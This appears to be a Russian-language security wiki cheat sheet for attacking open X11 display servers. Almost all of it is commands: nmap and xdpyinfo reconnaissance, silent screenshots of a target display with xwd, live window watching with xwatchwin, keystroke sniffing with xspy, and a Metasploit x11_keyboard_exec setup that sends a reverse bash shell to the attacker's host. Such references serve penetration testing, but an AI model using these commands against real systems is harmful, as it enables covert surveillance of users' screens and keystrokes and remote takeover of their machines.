X11 all
Материал из InformationSecurity WIKI
Содержание
Разведка
Поиск сервиса
nmap
nmap target -p 6000 --script x11-access
Проверка подключения
xdpyinfo
xdpyinfo -display <ip>:<display>
Информация об окнах
xwininfo
xwininfo -root -tree -display target:0
Атаки
Скриншоты
xwd
xwd -root -screen -silent -display target:0 > screenshot.xwd
convert screenshot.xwd screenshot.png
Слежка за экраном
xwatchwin
./xwatchwin target:0 -w window_id
Сниффер
Сниффать нажатия
xspy
xspy target
RCE
x11_keyboard_exec
use unix/x11/x11_keyboard_exec
set rhost target
set payload cmd/unix/reverse_bash
set lhost myip
set lport myport
set time_wait 10
run
xrdp
./xrdp.py <target:0> --no-disp
Там будет кнопка R-Shell